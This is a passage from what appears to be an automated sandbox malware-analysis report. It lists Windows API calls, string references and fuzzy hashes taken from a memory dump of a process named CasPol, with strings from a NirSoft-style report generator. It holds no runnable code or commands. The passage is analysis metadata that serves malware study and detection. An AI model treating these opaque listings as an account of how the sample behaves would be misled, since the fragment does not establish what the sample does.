                                                                                                                                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1700100422-0
                                                                                                                                                                                                                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 552707033-0
                                                                                                                                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C0A4
                                                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                    • String ID: 4$h
                                                                                                                                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                                                    • String ID: %%0.%df
                                                                                                                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                                                                                                                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                                                    • API String ID: 973020956-4135340389
                                                                                                                                                                                                                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                    • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                    • API String ID: 1284135714-318151290
                                                                                                                                                                                                                    • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 290601579-0
                                                                                                                                                                                                                    • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                                                    • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                    • String ID: PD$PD
                                                                                                                                                                                                                    • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                    • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2163313125-0
                                                                                                                                                                                                                    • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                    • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$wcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3592753638-3916222277
                                                                                                                                                                                                                    • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                    • String ID: %s (%s)$YV@
                                                                                                                                                                                                                    • API String ID: 3979103747-598926743
                                                                                                                                                                                                                    • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                    • API String ID: 2767993716-572158859
                                                                                                                                                                                                                    • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                                    APIs
